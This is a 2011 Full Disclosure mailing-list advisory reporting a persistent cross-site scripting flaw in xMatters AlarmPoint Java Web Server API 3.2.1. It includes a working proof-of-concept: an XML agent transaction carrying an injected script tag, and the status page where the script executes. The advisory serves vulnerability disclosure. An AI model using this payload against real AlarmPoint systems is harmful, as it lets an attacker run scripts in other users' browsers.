Full Disclosure mailing list archives
Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint
From: Juan Sacco <jsacco () insecurityresearch com>
Date: Wed, 27 Apr 2011 15:06:33 -0500
Information -------------------- Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web Server API Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Cross-Site Scripting Severity : High Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com> Description ------------------ The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details ------------------- AlarmPoint Java Web Server API is affected by a Persistent XSS vulnerability in version 3.2.1 Exploit as follow: Insert new HTTP API with the following malicious code: <?xml version="1.0"?> <transaction version="1.0"> <header> <method>Alive</method> </header> <data> <agent_client_id>ping</agent_client_id> </data> </transaction>'><script>alert(/XSS/)</script> Go to: http://example.com:2010/agent/status.html Reponse: AgentStatus 3.2.1 (Build 23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'><script>alert(/XSS/)</script> Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 Solution ------------------- No patch are available at this time. Credits ------------------- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _________________________________________________ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple vulnerabilities in MyBB MustLive (Apr 22)
- Re: Multiple vulnerabilities in MyBB Andrew Farmer (Apr 23)
- Re: Multiple vulnerabilities in MyBB MustLive (Apr 25)
- Re: Multiple vulnerabilities in MyBB Zach C. (Apr 25)
- Re: Multiple vulnerabilities in MyBB MustLive (Apr 27)
- Re: Multiple vulnerabilities in MyBB Zach C. (Apr 27)
- Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint Juan Sacco (Apr 28)
- Re: Multiple vulnerabilities in MyBB MustLive (Apr 25)
- Re: Multiple vulnerabilities in MyBB Andrew Farmer (Apr 23)